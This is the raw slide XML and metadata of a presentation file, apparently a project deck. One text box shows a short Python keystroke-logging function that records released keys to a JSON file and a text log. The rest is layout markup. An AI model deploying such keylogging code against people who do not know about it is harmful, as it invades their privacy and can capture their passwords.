                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>S</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9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="189" name="object 7" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="676440" y="6467400"/>
            <a:ext cx="2142720" cy="199800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739800" y="6473160"/>
            <a:ext cx="179856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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="24"/>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7B2013EC-9850-4E33-A467-519EE029CC0E}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1100" spc="9"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92" name="TextBox 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2882880" y="1433160"/>
            <a:ext cx="9219960" cy="36558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Calibri"/>
              </a:rPr>
              <a:t>def on_release(key):</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global flag, keys_used, keys</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keys_used.append(</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{'Released': f'{key}'}</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if flag == True:</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flag = False</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generate_json_file(keys_used)</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keys = keys + str(key)</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generate_text_log(str(keys))</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187</TotalTime>
  <Application>LibreOffice/24.2.3.2$Linux_X86_64 LibreOffice_project/420$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Words>1106</Words>
  <Paragraphs>152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2024-06-03T05:48:59Z</dcterms:created>
  <dc:creator>Saikumar Vaileti</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-23T10:05:53Z</dcterms:modified>
  <cp:revision>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PresentationFormat">
    <vt:lpwstr>Widescreen</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="Slides">
    <vt:i4>15</vt:i4>
  </property>
</Properties>
</file>